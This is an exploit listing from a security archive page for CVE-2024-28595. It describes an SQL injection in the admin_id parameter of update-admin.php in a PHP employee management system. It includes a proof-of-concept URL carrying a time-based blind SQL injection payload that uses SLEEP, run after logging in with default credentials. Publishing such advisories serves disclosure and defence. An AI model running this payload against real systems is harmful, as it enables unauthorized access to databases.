Lucene search

K
packetstormShubham PandeyPACKETSTORM:177681
HistoryMar 20, 2024 - 12:00 a.m.

Employee Management System 1.0 SQL Injection

2024-03-2000:00:00
Shubham Pandey
packetstormsecurity.com
160
employee management system
sql injection
cve-2024-28595
sourcecodester
windows
linux
arbitrary sql commands

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

50.8%

`# Exploit Title: SQL Injection vulnerability in Employee Management System.  
# Date: 20-03-2024  
# Exploit Author: Shubham Pandey  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link:  
https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Version: 1.0  
# Tested on: Windows, Linux  
# CVE : CVE-2024-28595  
# Description: SQL Injection vulnerability in Employee Management System  
v1.0 allows attackers to run arbitrary SQL commands via the admin_id  
parameter in update-admin.php.  
# POC:  
1. Here we go to : http://127.0.0.1/taskmatic/index.php  
2. Now login with default Username and Password.  
3. Visit the URL:  
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843  
WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'  
4. Page will load for 5 seconds because of time-based sql injection  
# Reference:  
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md  
`

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

50.8%

Related for PACKETSTORM:177681